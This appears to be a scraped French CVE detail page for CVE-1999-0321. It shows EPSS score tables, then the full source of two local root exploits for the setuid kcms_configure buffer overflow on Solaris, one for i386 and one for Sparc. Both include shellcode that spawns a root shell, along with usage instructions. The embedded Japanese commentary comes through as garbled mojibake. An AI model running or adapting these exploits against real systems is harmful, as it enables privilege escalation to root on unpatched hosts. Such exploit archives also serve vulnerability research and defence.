CVE-1999-0321 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.76%	–	–
2022-03-27	–	–	1.76%	–	–
2022-04-03	–	–	1.76%	–	–
2022-04-17	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.18%
2025-03-30	–	–	–	–	0.18%
2025-04-10	–	–	–	–	0.18%
2025-04-12	–	–	–	–	0.18%
2025-04-12	–	–	–	–	0.18,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	37%
2025-03-30	36%
2025-04-10	37%
2025-04-12	36%
2025-04-12	36%

// source: https://www.securityfocus.com/bid/452/info There is an unchecked sprintf() call in the versions of /usr/openwin/bin/kcms_configure shipped with solaris 2.5, 2.5.1 and 2.6. Unfortunately, kcms_configure is installed setuid root, making it possible for an attacker to overflow the buffer and have arbitrary code executed with superuser privileges. The consequence of this vulnerability being exploited is a local root compromise. /** *** kcmsex - i386 Solaris root exploit for /usr/openwin/bin/kcms_configure *** *** Tested and confirmed under Solaris 2.6 i386 *** *** Usage: % kcmsex [offset] *** *** where offset (if present) is the number of bytes to add to the stack *** pointer to calculate your target return address; try -1000 to 1000 in *** increments of 100 for starters. Thanks go to Sun for cranking out *** such sloppy privileged code. Keep those holes a coming, boys! *** *** Cheez Whiz *** cheezbeast@hotmail.com *** *** December 17, 1998 **/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define BUFLEN 500 #define NOP 0x90 char shell[] = /* 0 */ "\xeb\x3b" /* jmp springboard */ /* syscall: */ /* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 */ /* 9 */ "\xc3" /* ret */ /* start: */ /* 10 */ "\x5e" /* popl %esi */ /* 11 */ "\x31\xc0" /* xor %eax,%eax */ /* 13 */ "\x89\x46\xc1" /* movl %eax,-0x3f(%esi) */ /* 16 */ "\x88\x46\xc6" /* movb %al,-0x3a(%esi) */ /* 19 */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ /* 22 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ /* setuid: */ /* 25 */ "\x31\xc0" /* xor %eax,%eax */ /* 27 */ "\x50" /* pushl %eax */ /* 28 */ "\xb0\x17" /* movb $0x17,%al */ /* 30 */ "\xe8\xdf\xff\xff\xff" /* call syscall */ /* 35 */ "\x83\xc4\x04" /* addl $0x4,%esp */ /* execve: */ /* 38 */ "\x31\xc0" /* xor %eax,%eax */ /* 40 */ "\x50" /* pushl %eax */ /* 41 */ "\x8d\x5e\x08" /* leal 0x8(%esi),%ebx */ /* 44 */ "\x53" /* pushl %ebx */ /* 45 */ "\x8d\x1e" /* leal (%esi),%ebx */ /* 47 */ "\x89\x5e\x08" /* movl %ebx,0x8(%esi) */ /* 50 */ "\x53" /* pushl %ebx */ /* 51 */ "\xb0\x3b" /* movb $0x3b,%al */ /* 53 */ "\xe8\xc8\xff\xff\xff" /* call syscall */ /* 58 */ "\x83\xc4\x0c" /* addl $0xc,%esp */ /* springboard: */ /* 61 */ "\xe8\xc8\xff\xff\xff" /* call start */ /* data: */ /* 66 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA */ /* 74 */ "\xff\xff\xff\xff" /* DATA */ /* 78 */ "\xff\xff\xff\xff"; /* DATA */ char buf[BUFLEN]; unsigned long int nop, esp; long int offset = 0; unsigned long int get_esp() { __asm__("movl %esp,%eax"); } void main (int argc, char *argv[]) { int i; if (argc > 1) offset = strtol(argv[1], NULL, 0); if (argc > 2) nop = strtoul(argv[2], NULL, 0); else nop = 285; esp = get_esp(); memset(buf, NOP, BUFLEN); memcpy(buf+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < BUFLEN-4; i += 4) *((int *) &buf[i]) = esp+offset; printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n", esp+offset, esp, offset, nop); execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-P", buf, "foofoo", NULL); printf("exec failed!\n"); return; }

/* source: https://www.securityfocus.com/bid/452/info There is an unchecked sprintf() call in the versions of /usr/openwin/bin/kcms_configure shipped with solaris 2.5, 2.5.1 and 2.6. Unfortunately, kcms_configure is installed setuid root, making it possible for an attacker to overflow the buffer and have arbitrary code executed with superuser privileges. The consequence of this vulnerability being exploited is a local root compromise. UNYUN@ShadowPenguinSecurity$B$G$9(B $B<+8J%l%9$G$9!#(B > $B$J$*!"(BSolaris7 Sparc Edition$B$K$bF1MM$NLdBj$,$"$j$^$9$,!"(B > Solaris2.6(Sparc)$B$G$O:F8=$7$^$;$s$G$7$?!#(B Solaris 2.6 (Sparc)$B$G$b:F8=$9$k$h$&$G$9!#(B Solaris 2.6 (Sparc)$B$O%3%s%=!<%k%m%0%$%s$7$?>uBV$G%A%'%C%/$7$?$N$G$9$,!"%3(B $B%s%=!<%k%m%0%$%s$@$H$3$NLdBj$O(BSolaris7$B$G$b:F8=$7$J$$$h$&$G$9!#%M%C%H%o!<(B $B%/7PM3$G$N$_:F8=$9$k$h$&$G!"B>$N%^%7%s$+$i$N(Btelnet$B$K$F(BSolaris2.6 (Sparc) $B$G$b:F8=$9$k$3$H$,3NG'$5$l$^$7$?!#$*$=$i$/!"(Bintel$BHG(BSolaris2.6$B$bF1MM$@$H;W(B $B$o$l$^$9!#(B case 1: exploit$B2DG=(B hoge : $B%3%s%=!<%k%m%0%$%s(B hoge# xhost +vul hoge# telnet vul Login: Password: vul% setenv DISPLAY hoge:0.0 vul% gcc ex_kcms_configuresp.c vul% ./a.out # case 2: exploit$BIT2DG=(B hoge : $B%3%s%=!<%k%m%0%$%s(B hoge% gcc ex_kcms_configuresp.c hoge% ./a.out The specified profile could not be opened getlasterrorhoge% hoge% Sparc$B$N>l9g!"%*%U%;%C%H(B2092-2093,2112-2115$B$r(Bfake$B$9$k$3$H$K$h$j!"%*%U%;%C(B $B%H(B2116-2119$B$N(BRET$B$,M-8z$H$J$k$h$&$G!"(Bintel$BHGF1MM$K%m!<%+%k%f!<%6!<$,(Broot$B8"(B $B8B$rC%<h$G$-$k$3$H$,3NG'$5$l$^$7$?!#$J$*!"%3!<%I@)8B$O(BIntel$BHG$h$j2?8N$+4E(B $B$/$J$C$F$$$k$h$&$G$9!&!&!&(B */ //---- ex_kcms_configuresp.c /*============================================================================= kcms_configure Exploit for Solaris2.6/7 Sparc Edition The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #define ENV "NETPATH=" #define MAXBUF 3000 #define RETADR 2116 #define RETOFS 0x1300 #define EXPADR 1200 #define FAKEADR1 2092 #define FAKEADR2 2112 #define NOP 0xa61cc013 char exploit_code[] = "\x82\x10\x20\x17\x91\xd0\x20\x08" "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } main() { char buf[MAXBUF]; unsigned int i,ip,sp; putenv("LANG="); sp=get_sp(); printf("ESP =0x%x\n",sp); for (i=0;i<MAXBUF-4;i+=4){ buf[i+3]=NOP&0xff; buf[i+2]=(NOP>>8)&0xff; buf[i+1]=(NOP>>16)&0xff; buf[i ]=(NOP>>24)&0xff; } ip=sp; printf("FAKE=0x%x\n",sp); buf[FAKEADR1+3]=ip&0xff; buf[FAKEADR1+2]=(ip>>8)&0xff; buf[FAKEADR1+1]=(ip>>16)&0xff; buf[FAKEADR1 ]=(ip>>24)&0xff; buf[FAKEADR2+3]=ip&0xff; buf[FAKEADR2+2]=(ip>>8)&0xff; buf[FAKEADR2+1]=(ip>>16)&0xff; buf[FAKEADR2 ]=(ip>>24)&0xff; ip=sp-RETOFS; printf("EIP =0x%x\n",sp); buf[RETADR+3]=ip&0xff; buf[RETADR+2]=(ip>>8)&0xff; buf[RETADR+1]=(ip>>16)&0xff; buf[RETADR]=(ip>>24)&0xff; strncpy(buf+EXPADR,exploit_code,strlen(exploit_code)); strncpy(buf,ENV,strlen(ENV)); buf[MAXBUF-1]=0; putenv(buf); execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0); }